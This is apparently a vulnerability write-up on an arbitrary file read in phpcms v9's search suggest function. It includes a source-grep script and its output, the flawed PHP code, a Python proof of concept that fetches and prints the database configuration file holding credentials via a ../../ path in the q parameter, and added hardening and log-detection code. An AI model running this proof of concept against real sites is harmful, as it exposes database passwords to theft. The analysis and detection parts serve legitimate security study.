phpcms v9 password leak

   1. First there is http://www.wooyun.org/bugs/wooyun-2010-010072

      Someone reported that phpcms v9 leaks the password directly.

      At first I was puzzled: as I remembered it, the phpcms v9 admin password scheme uses a salt, so what use would just dumping the password be?

   2. Later someone pointed out that this is a follow-up to the earlier http://www.wooyun.org/bugs/wooyun-2010-09463

      I recall that vulnerability was originally reported as an XSS, but in substance it is a file_get_contents problem, which turns it into an arbitrary file read.

   3. Next comes the question of how to construct it and how to find it.

      I first used pfind to search for file_get_contents and got the following results:

#!/usr/bin/env python3
# pfind: recursively grep a source tree for dangerous sinks and request sources.
import os
from sys import argv


class pfind:
    # Patterns to look for: request sources and file read/write sinks.
    fun = ["$_REQUEST", "$_GET", "$_POST", "$_FILE", "fput", "fread", "fwrite",
           "file_get_contents", "file_put_contents"]
    # Alternative pattern sets (swap in as needed):
    # fun = ["include", "include_once", "require", "require_once", "show_source"]
    # fun = ["eval", "preg_replace+/e", "assert", "call_user_func", "call_user_func_array", "create_function"]
    # fun = ["get_rid"]
    # fun = ["select ", "update", "insret", "$_SERVER", "$_POST", "$_COOKIE", "$_REQUEST", "$_FILES", "$_ENV", "$_HTTP_COOKIE_VARS", "$_HTTP_ENV_VARS", "$_HTTP_GET_VARS", "$_HTTP_POST_FILES", "$_HTTP_POST_VARS", "$_HTTP_SERVER_VARS", "system", "exec", "passthru", "shell_exec", "popen", "proc_open", "eval", "assert", "fwrite", "fput", "fread", "file_put_contents", "move_uploaded_file"]

    def getfl(self, fl):
        """Walk directory fl recursively and scan every file it contains.

        All file types are scanned on purpose: the hits in .js templates
        (see the search_suggest.js result below) are what link a sink to
        the place it is called from.
        """
        for i in os.listdir(fl):
            path = os.path.join(fl, i)
            if os.path.isdir(path):
                self.getfl(path)
            elif os.path.isfile(path):
                self.findfun(path)

    def findfun(self, fl):
        """Report every line of fl containing any pattern in self.fun."""
        with open(fl, "r", errors="ignore") as fp:
            for ln, line in enumerate(fp, 1):
                for f in self.fun:
                    if f in line:
                        print("[+] File: " + fl)
                        print("[+] Line: " + str(ln))
                        print("[+] Have: " + f)
                        print("[+] Code: " + line.rstrip("\n"))
                        print()

    def vfind(self, fl, val):
        """Report every line of fl containing the single string val."""
        with open(fl, "r", errors="ignore") as fp:
            for ln, line in enumerate(fp, 1):
                if val in line:
                    print("[+] File: " + fl)
                    print("[+] Have: " + val)
                    print("[+] Line: " + str(ln))
                    print("[+] Code: " + line.rstrip("\n"))
                    print()


if __name__ == "__main__":
    try:
        c = argv[1]
        if c == "-p":
            a = pfind()
            a.getfl(argv[2])
        elif c == "-f":
            a = pfind()
            a.fun = [argv[3]]
            a.getfl(argv[2])
    except IndexError:
        # Missing arguments: print usage.
        print("[+] Code By Cond0r QQ 707447667")
        print("[+] Blog Pythoner.blog.com")
        print("[+] usage: " + argv[0] + " -p c:\\1\\")
        print("[+] usage: " + argv[0] + " -f c:\\1\\  $value")

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 28
[+] Have: file_get_contents
[+] Code: $license = file_get_contents(PHPCMS_PATH."install/license.txt");

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 78
[+] Have: file_get_contents
[+] Code: $returnid = @file_get_contents($remote_url);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 216
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents(PHPCMS_PATH."install/main/".$dbfile);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 276
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents(PHPCMS_PATH."install/main/".$dbfile);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 330
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents(PHPCMS_PATH."install/main/testsql.sql");

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 468
[+] Have: file_get_contents
[+] Code: $str = file_get_contents($configfile);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 484
[+] Have: file_get_contents
[+] Code: $str = file_get_contents($configfile);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\cache_file.class.php
[+] Line: 88
[+] Have: file_get_contents
[+] Code: $data = unserialize(file_get_contents($filepath.$filename));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\http.class.php
[+] Line: 54
[+] Have: file_get_contents
[+] Code: $this->post .= "\r\n".file_get_contents($v)."\r\n";

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\ip_area.class.php
[+] Line: 62
[+] Have: file_get_contents
[+] Code: $data = $xml->xml_unserialize(@file_get_contents($api_url));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\template_cache.class.php
[+] Line: 34
[+] Have: file_get_contents
[+] Code: $content = @file_get_contents ( $tplfile );

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\template_cache.class.php
[+] Line: 55
[+] Have: file_get_contents
[+] Code: $str = @file_get_contents ($tplfile);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\template_cache.class.php
[+] Line: 143
[+] Have: file_get_contents
[+] Code: $str .= '$json = @file_get_contents(\''.$datas['url'].'\');';

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\template_cache.class.php
[+] Line: 150
[+] Have: file_get_contents
[+] Code: $str .= '$xml_data = @file_get_contents(\''.$datas['url'].'\');';

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\functions\dir.func.php
[+] Line: 75
[+] Have: file_get_contents
[+] Code: file_put_contents($v, iconv($in_charset, $out_charset, file_get_contents($v)));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\functions\global.func.php
[+] Line: 1561
[+] Have: file_get_contents
[+] Code: function pc_file_get_contents($url, $timeout=30) {

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\functions\global.func.php
[+] Line: 1563
[+] Have: file_get_contents
[+] Code: return @file_get_contents($url, 0, $stream);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\cache_api.class.php
[+] Line: 262
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MODEL_PATH.'content_'.$classtype.'.class.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\cache_api.class.php
[+] Line: 266
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\cache_api.class.php
[+] Line: 383
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MEMBER_MODEL_PATH.'member_'.$classtype.'.class.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\cache_api.class.php
[+] Line: 387
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MEMBER_MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\card.class.php
[+] Line: 71
[+] Have: file_get_contents
[+] Code: if ($data = @file_get_contents(self::$server_url.$url)) {

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\module_api.class.php
[+] Line: 42
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents($this->installdir.$m.'.sql');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\module_api.class.php
[+] Line: 52
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\module_api.class.php
[+] Line: 182
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents($this->uninstalldir.$m.'.sql');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\database.php
[+] Line: 320
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents($filepath);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\database.php
[+] Line: 329
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents($filepath);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\functions\global.func.php
[+] Line: 49
[+] Have: file_get_contents
[+] Code: $str = file_get_contents($configfile);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\index.php
[+] Line: 288
[+] Have: file_get_contents
[+] Code: $snda_res_json = @file_get_contents($snda_check_url);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\menu.php
[+] Line: 44
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\menu.php
[+] Line: 90
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\menu.php
[+] Line: 95
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 230
[+] Have: file_get_contents
[+] Code: $data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_applist&s='.$s.'&p='.$p);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 233
[+] Have: file_get_contents
[+] Code: $recommed_data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_recommed_applist&s=5&p=1');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 236
[+] Have: file_get_contents
[+] Code: $focus_data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_app_focus&num=3');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 252
[+] Have: file_get_contents
[+] Code: $data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_detail_byappid&id='.$id);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 268
[+] Have: file_get_contents
[+] Code: $data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_detail_byappid&id='.$id);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 337
[+] Have: file_get_contents
[+] Code: @file_put_contents($upgradezip_path, @file_get_contents($upgradezip_url));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 377
[+] Have: file_get_contents
[+] Code: $data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_detail_byappid&id='.$id);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\cnzz\index.php
[+] Line: 22
[+] Have: file_get_contents
[+] Code: if ($data = @file_get_contents('http://wss.cnzz.com/user/companion/phpcms.php?domain='.APP_PATH.'&key='.$key.'&cms=phpcms')) {

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\collection\classes\collection.class.php
[+] Line: 218
[+] Have: file_get_contents
[+] Code: if (!empty($url) && $html = @file_get_contents($url)) {

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\collection\node.php
[+] Line: 154
[+] Have: file_get_contents
[+] Code: $data = json_decode(base64_decode(file_get_contents($filename)), true);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 48
[+] Have: file_get_contents
[+] Code: $model_sql = file_get_contents(MODEL_PATH.'model.sql');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 135
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MODEL_PATH.'content_'.$classtype.'.class.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 139
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 195
[+] Have: file_get_contents
[+] Code: $model_import = @file_get_contents($_FILES['model_import']['tmp_name']);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 206
[+] Have: file_get_contents
[+] Code: $model_sql = file_get_contents(MODEL_PATH.'model.sql');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\formguide\classes\formguide.class.php
[+] Line: 26
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MODEL_PATH.'formguide_'.$classtype.'.class.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\formguide\classes\formguide.class.php
[+] Line: 30
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\formguide\formguide.php
[+] Line: 46
[+] Have: file_get_contents
[+] Code: $create_sql = file_get_contents(MODEL_PATH.'create.sql');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\member_cache.class.php
[+] Line: 28
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MODEL_PATH.'member_'.$classtype.'.class.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\member_cache.class.php
[+] Line: 32
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\OauthSDK.class.php
[+] Line: 578
[+] Have: file_get_contents
[+] Code: @file_get_contents($url);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\qqoauth.class.php
[+] Line: 251
[+] Have: file_get_contents
[+] Code: file_get_contents(self::$POST_INPUT)

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\qqoauth.class.php
[+] Line: 840
[+] Have: file_get_contents
[+] Code: $content = file_get_contents( $url );

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\weibooauth.class.php
[+] Line: 251
[+] Have: file_get_contents
[+] Code: file_get_contents(self::$POST_INPUT)

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\weibooauth.class.php
[+] Line: 840
[+] Have: file_get_contents
[+] Code: $content = file_get_contents( $url );

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_menu.php
[+] Line: 46
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_menu.php
[+] Line: 90
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_menu.php
[+] Line: 95
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_model.php
[+] Line: 47
[+] Have: file_get_contents
[+] Code: $model_import = @file_get_contents($_FILES['model_import']['tmp_name']);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_model.php
[+] Line: 58
[+] Have: file_get_contents
[+] Code: $model_sql = file_get_contents(MODEL_PATH.'model.sql');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\scan\index.php
[+] Line: 88
[+] Have: file_get_contents
[+] Code: $html = file_get_contents(PHPCMS_PATH.$key);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\scan\index.php
[+] Line: 107
[+] Have: file_get_contents
[+] Code: $html = file_get_contents(PHPCMS_PATH.$key);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\scan\index.php
[+] Line: 133
[+] Have: file_get_contents
[+] Code: $html = file_get_contents(PHPCMS_PATH.$url);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\search\index.php
[+] Line: 201
[+] Have: file_get_contents
[+] Code: $res = @file_get_contents($url);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\file.php
[+] Line: 82
[+] Have: file_get_contents
[+] Code: $data = htmlspecialchars(file_get_contents($filepath));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\functions\global.func.php
[+] Line: 8
[+] Have: file_get_contents
[+] Code: $data = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\functions\global.func.php
[+] Line: 48
[+] Have: file_get_contents
[+] Code: $data = @file_get_contents($filepath);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\functions\global.func.php
[+] Line: 65
[+] Have: file_get_contents
[+] Code: $template_bak_db->insert(array('creat_at'=>SYS_TIME,'fileid'=>$style."_".$dir."_".$filename, 'userid'=>param::get_cookie('userid'), 'username'=>param::get_cookie('admin_username'), 'template'=>new_addslashes(file_get_contents($filepath))));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\style.php
[+] Line: 71
[+] Have: file_get_contents
[+] Code: $code = json_decode(base64_decode(file_get_contents($filename)), true);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 21
[+] Have: file_get_contents
[+] Code: $pathlist_str = @file_get_contents($upgrade_path_base);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 69
[+] Have: file_get_contents
[+] Code: @file_put_contents($upgradezip_path, @file_get_contents($upgradezip_url));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 99
[+] Have: file_get_contents
[+] Code: if (strtolower(substr($file_list[$fk], -3, 3)) == 'sql' && $data = file_get_contents($file_list[$fk])) {

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 131
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($menu_lan_file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 187
[+] Have: file_get_contents
[+] Code: $phpcms_md5 = @file_get_contents($this->_upgrademd5.$current_version['pc_release'].'_'.CHARSET.".php");

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\api\uc.php
[+] Line: 21
[+] Have: file_get_contents
[+] Code: $post = xml_unserialize(file_get_contents('php://input'));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\cache_file.class.php
[+] Line: 74
[+] Have: file_get_contents
[+] Code: $data = unserialize(file_get_contents($filepath.$filename));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\http.class.php
[+] Line: 54
[+] Have: file_get_contents
[+] Code: $this->post .= "\r\n".file_get_contents($v)."\r\n";

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\template_cache.class.php
[+] Line: 27
[+] Have: file_get_contents
[+] Code: $content = @file_get_contents ( $tplfile );

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\template_cache.class.php
[+] Line: 43
[+] Have: file_get_contents
[+] Code: $content = @file_get_contents ( $tplfile );

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\template_cache.class.php
[+] Line: 62
[+] Have: file_get_contents
[+] Code: $str = @file_get_contents ($tplfile);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\modules\admin\applications.php
[+] Line: 156
[+] Have: file_get_contents
[+] Code: if ($data = @file_get_contents($url.'code='.urlencode($param))) {

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\modules\admin\system.php
[+] Line: 56
[+] Have: file_get_contents
[+] Code: $html = file_get_contents($filepath);

 

That is a great many file_get_contents calls. The vulnerable one turned out to be in \phpcms\modules\search\index.php at line 203, as follows:

	public function public_get_suggest_keyword() {
		#echo 'ice test';
		$url = $_GET['url'].'&q='.$_GET['q'];
		#echo $url ;
		$res = @file_get_contents($url);
		#echo $res;
		if(CHARSET != 'gbk') {
			$res = iconv('gbk', CHARSET, $res);
		}
		echo $res;
	}

 As you can see, url and q are concatenated directly, i.e. url + '&q=' + q, and the result is passed straight to file_get_contents.
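To make the defect concrete, here is an added example (not phpcms code) that models the concatenation above in Python and places one possible fix beside it: an allow-list of upstream hosts plus proper query encoding of q. ALLOWED_HOSTS and the helper names are assumptions.

```python
"""Model of the URL handling in phpcms v9's public_get_suggest_keyword().

Added example (not phpcms code). build_url_vulnerable() mirrors the page's
concatenation `$_GET['url'].'&q='.$_GET['q']`; build_url_hardened() is one way
to fix it. ALLOWED_HOSTS and the helper names are assumptions, not phpcms's.
"""
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Assumed allow-list: the only upstream the page's search_suggest.js talks to.
ALLOWED_HOSTS = {"www.google.cn"}


def build_url_vulnerable(url: str, q: str) -> str:
    """Exactly what the PHP does: raw concatenation, no validation."""
    return url + "&q=" + q


def is_remote_http(target: str) -> bool:
    """True if file_get_contents() would treat target as an http(s) URL.

    Anything else (a relative path, another stream wrapper) is read from
    the local filesystem or that wrapper, which is the bug on the page.
    """
    parts = urlsplit(target)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def build_url_hardened(url: str, q: str) -> str:
    """Allow-list the upstream and encode q as a proper query parameter."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError("upstream must be http(s), got %r" % parts.scheme)
    if parts.username is not None or parts.port is not None:
        raise ValueError("userinfo and explicit ports are not allowed")
    if parts.hostname not in ALLOWED_HOSTS:
        raise ValueError("upstream host %r is not allow-listed" % parts.hostname)
    # Re-encode the query so q cannot smuggle extra parameters or separators.
    query = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
             if k != "q"]
    query.append(("q", q))
    return urlunsplit((parts.scheme, parts.netloc, parts.path,
                       urlencode(query), ""))


def accepts(url: str, q: str) -> bool:
    """Convenience wrapper: does the hardened builder accept this request?"""
    try:
        build_url_hardened(url, q)
        return True
    except ValueError:
        return False
```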

Next, find a place where it can be reached:

Again using pfind, searching for public_get_suggest_keyword gives the following code:

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\search\index.php
[+] Line: 198
[+] Have: public_get_suggest_keyword
[+] Code: public function public_get_suggest_keyword() {

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\statics\js\search_suggest.js
[+] Line: 2
[+] Have: public_get_suggest_keyword
[+] Code: $("#q").suggest("?m=search&c=index&a=public_get_suggest_keyword&url="+encodeURIComponent('http://www.google.cn/complete/search?hl=zh-CN&q='+$("#q").val()), {

The second hit is clearly where this dangerous method is called; it can be pulled out, and both the url and q parameters are directly controllable. What remains is how to construct a local file path. Because of the '&q=' in the middle I went down a wrong track and could not see how to get past it; then I looked at 疯子's exe, which did solve the problem, though the reason remains unclear to me....

Finally I wrote out the PoC:

#!/usr/bin/env python3
# coding=utf-8

"""
This script targets the phpcms v9 configuration file; its function is simple and crude.
Based on the WooYun report http://www.wooyun.org/bugs/wooyun-2010-010072
and material from 疯子's blog.

Code By icefish
"""
from sys import argv
import re
from urllib.request import Request, urlopen


def run(url):
    # Request shape from the report: url and q are concatenated server-side and
    # handed to file_get_contents(), so q ends up being read as a local path.
    url = url + '/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php'
    print('\n\n***********get DataBase Password:*************\n')
    print(url)
    req = Request(url)
    resp = urlopen(req)
    info = resp.read().decode('utf-8', errors='replace')
    # Strip tabs and the PHP array wrapper so only the key/value lines remain.
    s = info.replace('\t', '')
    s = re.sub(r'<\?php\s*return\s*array\s*\(', '', s)
    s = re.sub(r'>', '', s, flags=re.S)
    print('\n\n***********Get the Config.php****************')
    print(s)

    return info


if __name__ == '__main__':
    try:
        url = argv[1]
        if url:
            run(url)
    except IndexError:
        # Missing argument: print usage.
        print("[+] Code By icefish WeiBo http://weibo.com/u/1703624267")
        print("[+] Blog http://wcf1987.iteye.com/")
        print("[+] usage: " + argv[0] + " http://www.test.com/")
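From the defender's side, the request shape above is easy to spot in web-server logs. The following is an added example (not from the post): detection logic run over constructed combined-format access log lines, flagging calls to public_get_suggest_keyword whose url parameter is not an allow-listed http(s) upstream or whose q parameter looks like a filesystem path. The log lines, the 203.0.113.0/24 client addresses and ALLOWED_HOSTS are all constructed.

```python
"""Detection: flag abuse of phpcms v9's public_get_suggest_keyword endpoint.

Added example (not from the post). Scans combined-format access log lines
for the request shape described above. Log lines and ALLOWED_HOSTS are
constructed; the allow-list assumes the upstream used by search_suggest.js.
"""
import re
from urllib.parse import parse_qs, urlsplit

ALLOWED_HOSTS = {"www.google.cn"}  # assumption, see module docstring

# Constructed sample log lines (203.0.113.0/24 is a documentation range).
SAMPLE_LOG = """\
203.0.113.10 - - [01/Jan/2013:10:00:00 +0800] "GET /index.php?m=search&c=index&a=public_get_suggest_keyword&url=http%3A%2F%2Fwww.google.cn%2Fcomplete%2Fsearch%3Fhl%3Dzh-CN%26q%3Dphpcms&q=phpcms HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [01/Jan/2013:10:00:01 +0800] "GET /index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php HTTP/1.1" 200 1842 "-" "Python-urllib/2.7"
203.0.113.12 - - [01/Jan/2013:10:00:02 +0800] "GET /index.php?m=search&c=index&a=public_get_suggest_keyword&url=http%3A%2F%2Fexample.net%2Fsuggest&q=x HTTP/1.1" 200 77 "-" "curl/7.29"
203.0.113.13 - - [01/Jan/2013:10:00:03 +0800] "GET /index.php?m=content&c=index&a=lists&catid=6 HTTP/1.1" 200 9021 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Traversal, absolute paths (POSIX or drive letter) and stream-wrapper prefixes.
PATH_LIKE = re.compile(r'(\.\.[/\\]|^[/\\]|^[A-Za-z]:[/\\]|^[a-z][a-z0-9+.-]*://)')


def check_request(target: str):
    """Return the list of reasons this request target is suspicious (empty if none)."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if params.get("a") != ["public_get_suggest_keyword"]:
        return []
    reasons = []
    url = params.get("url", [""])[0]
    q = params.get("q", [""])[0]
    u = urlsplit(url)
    if u.scheme not in ("http", "https") or not u.netloc:
        # Not a remote URL: file_get_contents() would read a local path or wrapper.
        reasons.append("url is not an http(s) URL: %r" % url)
    elif u.hostname not in ALLOWED_HOSTS:
        reasons.append("url host not allow-listed: %r" % u.hostname)
    if PATH_LIKE.search(q):
        reasons.append("q looks like a path or stream wrapper: %r" % q)
    return reasons


def scan_log(text: str):
    """Return (client_ip, status, reasons) for every suspicious request in text."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = check_request(m.group("target"))
        if reasons:
            findings.append((m.group("ip"), m.group("status"), reasons))
    return findings


if __name__ == "__main__":
    for ip, status, reasons in scan_log(SAMPLE_LOG):
        print(ip, status, "; ".join(reasons))
```

A 200 status on a flagged request is the important signal: the endpoint echoes whatever file_get_contents returned, so a successful read leaves no error in the log.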
        
As for real-world impact: if the database does not accept remote connections, I don't think there is much real danger.... just my personal view.